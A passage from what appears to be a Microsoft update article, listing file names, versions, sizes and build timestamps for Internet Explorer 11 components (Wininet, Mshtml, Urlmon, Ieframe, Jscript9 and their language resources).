52,736| 14-Feb-21| 0:47 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:48 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:49 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:50 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:51 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:51 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:52 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:53 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:54 \nInetcpl.cpl| 11.0.9600.19963| 2,058,752| 13-Feb-21| 2:12 \nMshtml.dll.mui| 11.0.9600.19963| 307,200| 14-Feb-21| 0:26 \nMshtml.dll.mui| 11.0.9600.19963| 293,888| 14-Feb-21| 0:26 \nMshtml.dll.mui| 11.0.9600.19963| 290,304| 14-Feb-21| 0:27 \nMshtml.dll.mui| 11.0.9600.19963| 289,280| 14-Feb-21| 0:28 \nMshtml.dll.mui| 11.0.9600.19963| 299,008| 14-Feb-21| 0:29 \nMshtml.dll.mui| 11.0.9600.19963| 303,104| 14-Feb-21| 0:30 \nMshtml.dll.mui| 11.0.9600.19963| 282,112| 14-Feb-21| 2:00 \nMshtml.dll.mui| 11.0.9600.19963| 296,960| 14-Feb-21| 0:31 \nMshtml.dll.mui| 11.0.9600.19963| 283,648| 14-Feb-21| 0:32 \nMshtml.dll.mui| 11.0.9600.19963| 291,840| 14-Feb-21| 0:32 \nMshtml.dll.mui| 11.0.9600.19963| 299,520| 14-Feb-21| 0:33 \nMshtml.dll.mui| 11.0.9600.19963| 275,968| 14-Feb-21| 0:34 \nMshtml.dll.mui| 11.0.9600.19963| 290,816| 14-Feb-21| 0:35 \nMshtml.dll.mui| 11.0.9600.19963| 293,376| 14-Feb-21| 0:36 \nMshtml.dll.mui| 11.0.9600.19963| 296,960| 14-Feb-21| 0:37 \nMshtml.dll.mui| 11.0.9600.19963| 258,048| 14-Feb-21| 0:38 \nMshtml.dll.mui| 11.0.9600.19963| 256,512| 14-Feb-21| 0:39 \nMshtml.dll.mui| 11.0.9600.19963| 289,280| 14-Feb-21| 0:39 \nMshtml.dll.mui| 11.0.9600.19963| 288,256| 14-Feb-21| 0:40 \nMshtml.dll.mui| 11.0.9600.19963| 285,184| 14-Feb-21| 0:41 \nMshtml.dll.mui| 11.0.9600.19963| 295,424| 14-Feb-21| 0:42 \nMshtml.dll.mui| 11.0.9600.19963| 297,472| 14-Feb-21| 0:43 \nMshtml.dll.mui| 11.0.9600.19963| 292,864| 14-Feb-21| 0:44 \nMshtml.dll.mui| 11.0.9600.19963| 295,424| 14-Feb-21| 0:44 \nMshtml.dll.mui| 11.0.9600.19963| 294,400| 14-Feb-21| 0:45 \nMshtml.dll.mui| 11.0.9600.19963| 294,400| 14-Feb-21| 0:46 \nMshtml.dll.mui| 11.0.9600.19963| 292,864| 14-Feb-21| 0:47 \nMshtml.dll.mui| 11.0.9600.19963| 290,816| 14-Feb-21| 0:47 \nMshtml.dll.mui| 11.0.9600.19963| 288,768| 14-Feb-21| 0:48 \nMshtml.dll.mui| 11.0.9600.19963| 286,208| 14-Feb-21| 0:49 \nMshtml.dll.mui| 11.0.9600.19963| 281,600| 14-Feb-21| 0:50 \nMshtml.dll.mui| 11.0.9600.19963| 286,720| 14-Feb-21| 0:51 \nMshtml.dll.mui| 11.0.9600.19963| 292,352| 14-Feb-21| 0:52 \nMshtml.dll.mui| 11.0.9600.19963| 242,176| 14-Feb-21| 0:52 \nMshtml.dll.mui| 11.0.9600.19963| 243,200| 14-Feb-21| 0:53 \nMshtml.dll.mui| 11.0.9600.19963| 243,200| 14-Feb-21| 0:54 \nUrlmon.dll.mui| 11.0.9600.19963| 46,080| 14-Feb-21| 0:26 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:26 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:27 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 0:28 \nUrlmon.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:29 \nUrlmon.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:30 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:31 \nUrlmon.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 0:32 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:32 \nUrlmon.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:33 \nUrlmon.dll.mui| 11.0.9600.19963| 45,056| 14-Feb-21| 0:34 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:36 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:36 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 0:36 \nUrlmon.dll.mui| 11.0.9600.19963| 39,936| 14-Feb-21| 0:37 \nUrlmon.dll.mui| 11.0.9600.19963| 39,424| 14-Feb-21| 0:38 \nUrlmon.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 0:39 \nUrlmon.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 0:40 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:41 \nUrlmon.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:42 \nUrlmon.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:43 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 0:43 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:44 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:45 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:46 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:47 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:47 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 0:48 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:49 \nUrlmon.dll.mui| 11.0.9600.19963| 48,128| 14-Feb-21| 0:50 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:51 \nUrlmon.dll.mui| 11.0.9600.19963| 48,128| 14-Feb-21| 0:51 \nUrlmon.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 0:52 \nUrlmon.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 0:53 \nUrlmon.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 0:54 \nJsproxy.dll| 11.0.9600.19963| 47,104| 13-Feb-21| 2:41 \nWininet.dll| 11.0.9600.19963| 4,388,352| 13-Feb-21| 1:53 \nInetcpl.cpl.mui| 11.0.9600.19963| 114,176| 14-Feb-21| 0:26 \nInetcpl.cpl.mui| 11.0.9600.19963| 130,560| 14-Feb-21| 0:26 \nInetcpl.cpl.mui| 11.0.9600.19963| 124,928| 14-Feb-21| 0:27 \nInetcpl.cpl.mui| 11.0.9600.19963| 122,880| 14-Feb-21| 0:28 \nInetcpl.cpl.mui| 11.0.9600.19963| 130,048| 14-Feb-21| 0:29 \nInetcpl.cpl.mui| 11.0.9600.19963| 138,240| 14-Feb-21| 0:30 \nInetcpl.cpl.mui| 11.0.9600.19963| 114,688| 14-Feb-21| 2:00 \nInetcpl.cpl.mui| 11.0.9600.19963| 131,584| 14-Feb-21| 0:31 \nInetcpl.cpl.mui| 11.0.9600.19963| 117,760| 14-Feb-21| 0:32 \nInetcpl.cpl.mui| 11.0.9600.19963| 122,368| 14-Feb-21| 0:33 \nInetcpl.cpl.mui| 11.0.9600.19963| 134,144| 14-Feb-21| 0:33 \nInetcpl.cpl.mui| 11.0.9600.19963| 107,008| 14-Feb-21| 0:34 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,392| 14-Feb-21| 0:35 \nInetcpl.cpl.mui| 11.0.9600.19963| 127,488| 14-Feb-21| 0:36 \nInetcpl.cpl.mui| 11.0.9600.19963| 128,512| 14-Feb-21| 0:37 \nInetcpl.cpl.mui| 11.0.9600.19963| 88,576| 14-Feb-21| 0:38 \nInetcpl.cpl.mui| 11.0.9600.19963| 82,944| 14-Feb-21| 0:39 \nInetcpl.cpl.mui| 11.0.9600.19963| 125,440| 14-Feb-21| 0:39 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,392| 14-Feb-21| 0:40 \nInetcpl.cpl.mui| 11.0.9600.19963| 120,320| 14-Feb-21| 0:41 \nInetcpl.cpl.mui| 11.0.9600.19963| 130,560| 14-Feb-21| 0:42 \nInetcpl.cpl.mui| 11.0.9600.19963| 129,024| 14-Feb-21| 0:43 \nInetcpl.cpl.mui| 11.0.9600.19963| 125,952| 14-Feb-21| 0:44 \nInetcpl.cpl.mui| 11.0.9600.19963| 129,024| 14-Feb-21| 0:44 \nInetcpl.cpl.mui| 11.0.9600.19963| 128,000| 14-Feb-21| 0:45 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,904| 14-Feb-21| 0:46 \nInetcpl.cpl.mui| 11.0.9600.19963| 129,024| 14-Feb-21| 0:47 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,904| 14-Feb-21| 0:47 \nInetcpl.cpl.mui| 11.0.9600.19963| 124,416| 14-Feb-21| 0:49 \nInetcpl.cpl.mui| 11.0.9600.19963| 121,856| 14-Feb-21| 0:49 \nInetcpl.cpl.mui| 11.0.9600.19963| 115,712| 14-Feb-21| 0:50 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,904| 14-Feb-21| 0:51 \nInetcpl.cpl.mui| 11.0.9600.19963| 125,440| 14-Feb-21| 0:51 \nInetcpl.cpl.mui| 11.0.9600.19963| 72,704| 14-Feb-21| 0:52 \nInetcpl.cpl.mui| 11.0.9600.19963| 73,728| 14-Feb-21| 0:53 \nInetcpl.cpl.mui| 11.0.9600.19963| 73,728| 14-Feb-21| 0:54 \nMsfeedsbs.dll| 11.0.9600.19963| 52,736| 13-Feb-21| 2:21 \nMsfeedsbs.mof| Not versioned| 1,574| 13-Feb-21| 0:34 \nMsfeedssync.exe| 11.0.9600.19963| 11,776| 13-Feb-21| 2:48 \nMicrosoft-windows-ie-htmlrendering.ptxml| Not versioned| 3,228| 13-Feb-21| 0:23 \nMshtml.dll| 11.0.9600.19963| #########| 13-Feb-21| 2:58 \nMshtml.tlb| 11.0.9600.19963| 2,724,864| 13-Feb-21| 2:59 \nIeproxy.dll| 11.0.9600.19963| 310,784| 13-Feb-21| 1:45 \nIeshims.dll| 11.0.9600.19963| 290,304| 13-Feb-21| 1:51 \nIertutil.dll| 11.0.9600.19963| 2,308,096| 13-Feb-21| 2:44 \nSqmapi.dll| 6.2.9200.16384| 228,256| 14-Feb-21| 0:24 \nIeframe.dll.mui| 11.0.9600.19963| 2,066,432| 14-Feb-21| 0:26 \nIeframe.dll.mui| 11.0.9600.19963| 2,121,216| 14-Feb-21| 0:27 \nIeframe.dll.mui| 11.0.9600.19963| 2,075,136| 14-Feb-21| 0:28 \nIeframe.dll.mui| 11.0.9600.19963| 2,063,872| 14-Feb-21| 0:29 \nIeframe.dll.mui| 11.0.9600.19963| 2,314,240| 14-Feb-21| 0:29 \nIeframe.dll.mui| 11.0.9600.19963| 2,390,528| 14-Feb-21| 0:30 \nIeframe.dll.mui| 11.0.9600.19963| 2,033,152| 14-Feb-21| 2:00 \nIeframe.dll.mui| 11.0.9600.19963| 2,307,584| 14-Feb-21| 0:31 \nIeframe.dll.mui| 11.0.9600.19963| 2,255,872| 14-Feb-21| 0:32 \nIeframe.dll.mui| 11.0.9600.19963| 2,061,312| 14-Feb-21| 0:33 \nIeframe.dll.mui| 11.0.9600.19963| 2,326,016| 14-Feb-21| 0:34 \nIeframe.dll.mui| 11.0.9600.19963| 2,019,840| 14-Feb-21| 0:35 \nIeframe.dll.mui| 11.0.9600.19963| 2,071,040| 14-Feb-21| 0:35 \nIeframe.dll.mui| 11.0.9600.19963| 2,082,816| 14-Feb-21| 0:36 \nIeframe.dll.mui| 11.0.9600.19963| 2,307,584| 14-Feb-21| 0:37 \nIeframe.dll.mui| 11.0.9600.19963| 2,170,368| 14-Feb-21| 0:38 \nIeframe.dll.mui| 11.0.9600.19963| 2,153,984| 14-Feb-21| 0:39 \nIeframe.dll.mui| 11.0.9600.19963| 2,291,712| 14-Feb-21| 0:40 \nIeframe.dll.mui| 11.0.9600.19963| 2,283,520| 14-Feb-21| 0:40 \nIeframe.dll.mui| 11.0.9600.19963| 2,052,096| 14-Feb-21| 0:41 \nIeframe.dll.mui| 11.0.9600.19963| 2,301,952| 14-Feb-21| 0:42 \nIeframe.dll.mui| 11.0.9600.19963| 2,093,056| 14-Feb-21| 0:43 \nIeframe.dll.mui| 11.0.9600.19963| 2,075,648| 14-Feb-21| 0:44 \nIeframe.dll.mui| 11.0.9600.19963| 2,299,392| 14-Feb-21| 0:45 \nIeframe.dll.mui| 11.0.9600.19963| 2,094,592| 14-Feb-21| 0:45 \nIeframe.dll.mui| 11.0.9600.19963| 2,316,800| 14-Feb-21| 0:46 \nIeframe.dll.mui| 11.0.9600.19963| 2,305,536| 14-Feb-21| 0:47 \nIeframe.dll.mui| 11.0.9600.19963| 2,278,912| 14-Feb-21| 0:48 \nIeframe.dll.mui| 11.0.9600.19963| 2,277,888| 14-Feb-21| 0:48 \nIeframe.dll.mui| 11.0.9600.19963| 2,060,288| 14-Feb-21| 0:49 \nIeframe.dll.mui| 11.0.9600.19963| 2,315,776| 14-Feb-21| 0:50 \nIeframe.dll.mui| 11.0.9600.19963| 2,278,912| 14-Feb-21| 0:51 \nIeframe.dll.mui| 11.0.9600.19963| 2,324,992| 14-Feb-21| 0:52 \nIeframe.dll.mui| 11.0.9600.19963| 2,098,176| 14-Feb-21| 0:53 \nIeframe.dll.mui| 11.0.9600.19963| 1,890,304| 14-Feb-21| 0:54 \nIeframe.dll.mui| 11.0.9600.19963| 1,890,304| 14-Feb-21| 0:55 \nIeframe.dll| 11.0.9600.19963| #########| 13-Feb-21| 2:09 \nIeframe.ptxml| Not versioned| 24,486| 13-Feb-21| 0:23 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:26 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:26 \nInetres.adml| Not versioned| 526,294| 14-Feb-21| 0:27 \nInetres.adml| Not versioned| 499,654| 14-Feb-21| 0:28 \nInetres.adml| Not versioned| 552,337| 14-Feb-21| 0:29 \nInetres.adml| Not versioned| 944,559| 14-Feb-21| 0:30 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 1:59 \nInetres.adml| Not versioned| 543,946| 14-Feb-21| 0:31 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:32 \nInetres.adml| Not versioned| 526,557| 14-Feb-21| 0:32 \nInetres.adml| Not versioned| 575,838| 14-Feb-21| 0:33 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:34 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:35 \nInetres.adml| Not versioned| 570,737| 14-Feb-21| 0:36 \nInetres.adml| Not versioned| 548,119| 14-Feb-21| 0:37 \nInetres.adml| Not versioned| 639,271| 14-Feb-21| 0:38 \nInetres.adml| Not versioned| 525,504| 14-Feb-21| 0:38 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:39 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:40 \nInetres.adml| Not versioned| 488,488| 14-Feb-21| 0:41 \nInetres.adml| Not versioned| 548,494| 14-Feb-21| 0:42 \nInetres.adml| Not versioned| 559,343| 14-Feb-21| 0:42 \nInetres.adml| Not versioned| 535,067| 14-Feb-21| 0:43 \nInetres.adml| Not versioned| 541,455| 14-Feb-21| 0:44 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:45 \nInetres.adml| Not versioned| 804,470| 14-Feb-21| 0:46 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:47 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:47 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:48 \nInetres.adml| Not versioned| 503,909| 14-Feb-21| 0:49 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:50 \nInetres.adml| Not versioned| 521,583| 14-Feb-21| 0:51 \nInetres.adml| Not versioned| 457,561| 14-Feb-21| 0:51 \nInetres.adml| Not versioned| 420,082| 14-Feb-21| 0:52 \nInetres.adml| Not versioned| 436,651| 14-Feb-21| 0:53 \nInetres.adml| Not versioned| 436,651| 14-Feb-21| 0:54 \nInetres.admx| Not versioned| 1,678,023| 12-Jan-21| 3:25 \nJscript9.dll.mui| 11.0.9600.19963| 29,184| 14-Feb-21| 0:26 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:26 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 0:27 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 0:28 \nJscript9.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 0:29 \nJscript9.dll.mui| 11.0.9600.19963| 37,888| 14-Feb-21| 0:30 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 2:00 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 0:31 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:31 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 0:32 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 0:33 \nJscript9.dll.mui| 11.0.9600.19963| 27,648| 14-Feb-21| 0:34 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:35 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 0:36 \nJscript9.dll.mui| 11.0.9600.19963| 33,792| 14-Feb-21| 0:36 \nJscript9.dll.mui| 11.0.9600.19963| 23,040| 14-Feb-21| 0:38 \nJscript9.dll.mui| 11.0.9600.19963| 22,016| 14-Feb-21| 0:39 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:39 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:40 \nJscript9.dll.mui| 11.0.9600.19963| 31,232| 14-Feb-21| 0:41 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 0:42 \nJscript9.dll.mui| 11.0.9600.19963| 35,840| 14-Feb-21| 0:42 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 0:43 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 0:45 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:45 \nJscript9.dll.mui| 11.0.9600.19963| 34,816| 14-Feb-21| 0:46 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 0:47 \nJscript9.dll.mui| 11.0.9600.19963| 32,256| 14-Feb-21| 0:47 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:48 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 0:49 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:50 \nJscript9.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:51 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:51 \nJscript9.dll.mui| 11.0.9600.19963| 16,384| 14-Feb-21| 0:52 \nJscript9.dll.mui| 11.0.9600.19963| 16,896| 14-Feb-21| 0:53 \nJscript9.dll.mui| 11.0.9600.19963| 16,896| 14-Feb-21| 0:54 \nJscript9.dll| 11.0.9600.19963| 4,112,384| 13-Feb-21| 2:14 \nJscript9diag.dll| 11.0.9600.19963| 620,032| 13-Feb-21| 2:37 \nJscript.dll| 5.8.9600.19963| 653,824| 13-Feb-21| 2:37 \nVbscript.dll| 5.8.9600.19963| 498,176| 13-Feb-21| 2:47 \n \n## \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time** \n---|---|---|---|--- \nUrlmon.dll| 11.0.9600.19963| 1,569,280| 13-Feb-21| 2:04 \nIexplore.exe| 11.0.9600.19963| 810,408| 14-Feb-21| 1:21 \nWininet.dll.mui| 11.0.9600.19963| 46,592| 14-Feb-21| 1:22 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 1:23 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 1:24 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 1:25 \nWininet.dll.mui| 11.0.9600.19963| 56,320| 14-Feb-21| 1:25 \nWininet.dll.mui| 11.0.9600.19963| 57,856| 14-Feb-21| 1:27 \nWininet.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 2:26 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 1:27 \nWininet.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 1:28 \nWininet.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 1:29 \nWininet.dll.mui| 11.0.9600.19963| 55,296| 14-Feb-21| 1:29 \nWininet.dll.mui| 11.0.9600.19963| 45,056| 14-Feb-21| 1:31 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 1:31 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 1:32 \nWininet.dll.mui| 11.0.9600.19963| 53,248| 14-Feb-21| 1:33 \nWininet.dll.mui| 11.0.9600.19963| 39,424| 14-Feb-21| 1:34 \nWininet.dll.mui| 11.0.9600.19963| 35,840| 14-Feb-21| 1:34 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 1:35 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 1:36 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 1:37 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 1:38 \nWininet.dll.mui| 11.0.9600.19963| 53,760| 14-Feb-21| 1:39 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 1:40 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 1:41 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 1:42 \nWininet.dll.mui| 11.0.9600.19963| 53,248| 14-Feb-21| 1:42 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 1:43 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 1:44 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 1:45 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 1:46 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 1:46 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 1:47 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 1:48 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 1:49 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 1:50 \nInetcpl.cpl| 11.0.9600.19963| 2,132,992| 13-Feb-21| 2:26 \nMshtml.dll.mui| 11.0.9600.19963| 307,200| 14-Feb-21| 1:22 \nMshtml.dll.mui| 11.0.9600.19963| 293,888| 14-Feb-21| 1:23 \nMshtml.dll.mui| 11.0.9600.19963| 290,304| 14-Feb-21| 1:24 \nMshtml.dll.mui| 11.0.9600.19963| 289,280| 14-Feb-21| 1:25 \nMshtml.dll.mui| 11.0.9600.19963| 299,008| 14-Feb-21| 1:26 \nMshtml.dll.mui| 11.0.9600.19963| 303,104| 14-Feb-21| 1:27 \nMshtml.dll.mui| 11.0.9600.19963| 282,112| 14-Feb-21| 2:26 \nMshtml.dll.mui| 11.0.9600.19963| 296,960| 14-Feb-21| 1:27 \nMshtml.dll.mui| 11.0.9600.19963| 283,648| 14-Feb-21| 1:28 \nMshtml.dll.mui| 11.0.9600.19963| 291,840| 14-Feb-21| 1:29 \nMshtml.dll.mui| 11.0.9600.19963| 299,520| 14-Feb-21| 1:30 \nMshtml.dll.mui| 11.0.9600.19963| 275,968| 14-Feb-21| 1:30 \nMshtml.dll.mui| 11.0.9600.19963| 290,816| 14-Feb-21| 1:32 \nMshtml.dll.mui| 11.0.9600.19963| 293,376| 14-Feb-21| 1:32 \nMshtml.dll.mui| 11.0.9600.19963| 296,960| 14-Feb-21| 1:33 \nMshtml.dll.mui| 11.0.9600.19963| 258,048| 14-Feb-21| 1:34 \nMshtml.dll.mui| 11.0.9600.19963| 256,512| 14-Feb-21| 1:35 \nMshtml.dll.mui| 11.0.9600.19963| 289,280| 14-Feb-21| 1:36 \nMshtml.dll.mui| 11.0.9600.19963| 288,256| 14-Feb-21| 1:36 \nMshtml.dll.mui| 11.0.9600.19963| 285,184| 14-Feb-21| 1:37 \nMshtml.dll.mui| 11.0.9600.19963| 295,424| 14-Feb-21| 1:38 \nMshtml.dll.mui| 11.0.9600.19963| 297,472| 14-Feb-21| 1:39 \nMshtml.dll.mui| 11.0.9600.19963| 292,864| 14-Feb-21| 1:40 \nMshtml.dll.mui| 11.0.9600.19963| 295,424| 14-Feb-21| 1:40 \nMshtml.dll.mui| 11.0.9600.19963| 294,400| 14-Feb-21| 1:41 \nMshtml.dll.mui| 11.0.9600.19963| 294,400| 14-Feb-21| 1:42 \nMshtml.dll.mui| 11.0.9600.19963| 292,864| 14-Feb-21| 1:43 \nMshtml.dll.mui| 11.0.9600.19963| 290,816| 14-Feb-21| 1:43 \nMshtml.dll.mui| 11.0.9600.19963| 288,768| 14-Feb-21| 1:44 \nMshtml.dll.mui| 11.0.9600.19963| 286,208| 14-Feb-21| 1:45 \nMshtml.dll.mui| 11.0.9600.19963| 281,600| 14-Feb-21| 1:46 \nMshtml.dll.mui| 11.0.9600.19963| 286,720| 14-Feb-21| 1:46 \nMshtml.dll.mui| 11.0.9600.19963| 292,352| 14-Feb-21| 1:47 \nMshtml.dll.mui| 11.0.9600.19963| 242,176| 14-Feb-21| 1:48 \nMshtml.dll.mui| 11.0.9600.19963| 243,200| 14-Feb-21| 1:49 \nMshtml.dll.mui| 11.0.9600.19963| 243,200| 14-Feb-21| 1:50 \nUrlmon.dll.mui| 11.0.9600.19963| 46,080| 14-Feb-21| 1:23 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 1:23 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 1:24 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 1:25 \nUrlmon.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 1:26 \nUrlmon.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 1:26 \nUrlmon.dll.mui| 11.0.9600.19963| 48,128| 14-Feb-21| 2:26 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 1:27 \nUrlmon.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 1:28 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 1:29 \nUrlmon.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 1:29 \nUrlmon.dll.mui| 11.0.9600.19963| 45,056| 14-Feb-21| 1:30 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 1:31 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 1:32 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 1:33 \nUrlmon.dll.mui| 11.0.9600.19963| 39,936| 14-Feb-21| 1:34 \nUrlmon.dll.mui| 11.0.9600.19963| 39,424| 14-Feb-21| 1:35 \nUrlmon.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 1:36 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 1:38 \nUrlmon.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 1:38 \nUrlmon.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 1:39 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 1:40 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 1:40 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 1:41 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 1:42 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 1:42 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 1:43 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 1:44 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 1:45 \nUrlmon.dll.mui| 11.0.9600.19963| 48,128| 14-Feb-21| 1:46 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 1:46 \nUrlmon.dll.mui| 11.0.9600.19963| 48,128| 14-Feb-21| 1:47 \nUrlmon.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 1:48 \nUrlmon.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 1:49 